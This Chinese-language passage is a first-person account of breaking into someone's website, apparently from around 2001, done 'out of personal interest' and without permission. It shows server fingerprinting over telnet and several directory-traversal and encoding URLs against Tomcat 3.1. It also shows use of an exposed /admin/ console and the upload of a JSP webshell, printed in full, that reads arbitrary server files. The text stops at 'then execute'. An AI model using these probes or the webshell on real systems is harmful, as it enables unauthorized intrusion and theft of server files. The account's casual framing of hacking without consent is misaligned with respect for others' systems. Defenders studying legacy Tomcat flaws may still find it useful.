很偶然的一个机会,浏览到一个网站,页面清新让人感觉很舒服。网站是用JSP开发的,出于个人爱好,我决定测试一下其系统的安全性。telnet www.target.com 8080GET /CHINANSL HTTP/1.1[Enter][Enter]
返回的结果如下:HTTP/1.0 404 Not FoundDate: Sun, 08 Jul 2001 07:49:13 GMTServlet-Engine: Tomcat Web Server/3.1 (JSP 1.1; Servlet 2.2; Java 1.2.2; Linux 2.2.12 i386; java.vendor=Blackdown Java-Linux Team)Content-Language: enContent-Type: text/htmlStatus: 404〈h1〉Error: 404〈/h1〉〈h2〉Location: /CHINANSL〈/h2〉File Not Found〈br〉/CHINANSL
获得了运行的WEBServer的名称“Tomcat 3.1”。记得曾经发现过这个版本的漏洞,并且post到bugtrap上去过。
回忆一下,大概是通过“..”技术可以退出WEB目录,于是:http://target:8080/../../../../%00.jsp (不行)http://target:8080/file/index.jsp (不行)http://target:8080/index.JSP (不行)http://target:8080/index.jsp%81 (不行)http://target:8080/index.js%70 (不行)http://target:8080/index.jsp%2581 (不行)http://target:8080/WEB-INF/ (不行)
看来安全状况似乎还不错,我们再来进行一下更深层的测试。Tomcat 3.1自带了一个管理工具,可以查看WEB下的目录及文件,并且可以添加context。于是尝试:http://target:8080/admin/
管理员果然没有删除或禁止访问这个目录,从安全的角度说,这点应该算是一个比较重要的失误。
接着,点击“VIEW ALL CONTEXT”按钮,列出了WEB目录下的一些文件和目录的名称,很快发现了一个上传文件的组件,通过这个组件将一个JSP文件上传到对方的WEB目录里:〈%@ page import="java.io.*" %〉〈%String file = request.getParameter("file");String str = "";FileInputStream fis = null;DataInputStream dis = null;try{fis = new FileInputStream(file);dis = new DataInputStream(fis);while(true){try{str = dis.readLine();}catch(Exception e){}if(str == null)break;out.print(str+"〈br〉");}}catch(IOException e){}%〉
然后执行: